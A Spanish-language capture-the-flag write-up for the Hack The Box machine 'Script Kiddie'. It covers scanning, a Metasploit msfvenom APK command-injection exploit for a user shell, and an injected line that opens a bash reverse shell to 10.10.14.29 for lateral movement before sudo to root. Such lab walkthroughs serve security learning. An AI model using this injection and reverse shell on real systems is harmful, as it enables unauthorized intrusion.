Hack the Box - Script Kiddie Writeup

- 3 mins

Summary

Script Kiddie es una maquina bastante sencilla, el usuario es pensar un poco fuera de la caja. La parte del root es analizar un script sh, inyectar codigo para escalar hacia otra cuenta y de ahi con privilegios de sudo obtener una shell de root, esta maquina en si no tiene complejidad.

masscan_01

Info de la maquina

VM column Detalles
Nombre Script Kiddie
Dificultad Easy
Release 06/02/2021
OS Linux
IP 10.10.10.226

Editamos /etc/hosts y agregamos la IP 10.10.10.226 que apunte hacia scriptkiddie.htb

Escaneo de Puertos

Escaneamos los puertos con Masscan y Nmap, utilizando Masscan_To_Nmap , esta herramienta escanea puertos TCP y UDP, toma los abiertos y ejecuta Nmap en búsqueda de servicios y scripts por default, mas info y donde conseguir el script:

Ejecutamos el script : sudo python3 masscan_to_nmap.py -i 10.10.10.226

masscan_01

Tenemos los siguientes dos puertos : 5000 y 22 , el resultado de Nmap nos arroja lo siguiente:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
	

Super H4x0r

Procedemos a verificar el puerto 5000

h4x0r

Un h4x0r WebSite xD, a simple vista tenemos tres(3) herramientas : nmap , msfvenom y searchsploit

1) Nmap :

h4x0r

No se le puede sacar mas provecho.

2) Searchsploit :

h4x0r_02

3) Msfvenom y why not, usaremos el mismo searchsploit para buscar algo al respecto:

h4x0r_03

Encontramos algo interesante, usaremos ese exploit.

msf01

User

exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf02

Esto nos va a generar un archivo .apk

msf03

msf04

Ponemos netcat a la escucha y :

msf05

Le hacemos un upgrade a nuestra shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

kid_user

Ya tenemos el 1er flag :)

Root

No hay mucho que hacer, no hay privilegios con sudo, no hay archivos con lo que podamos interactuar, nada interesante en el crontab o en los procesos, asi que hacemos algo de enum basico y nos movemo hacia el otro usuario pwn : /home/pwn veremos un script sh :

kid_02

Mientras se cumpla la condicion , ejecuta la sentencia de nmap y lo escribe en hackers , dado que el script es del usuario pwn :

pwn

Intentaremos meter codigo para obtener un rev shell:

echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.29/4445 0>&1' #" >> hackers

pwn_01

pwn_02

Verificamos los privilegios de sudo :

root_01

Procedemos :

sudo /opt/metasploit-framework-6.0.9/msfconsole

root_02

:)

root_03

Una maquina bastante sencilla, con esto finalizamos el writeup.

gali

comments powered by Disqus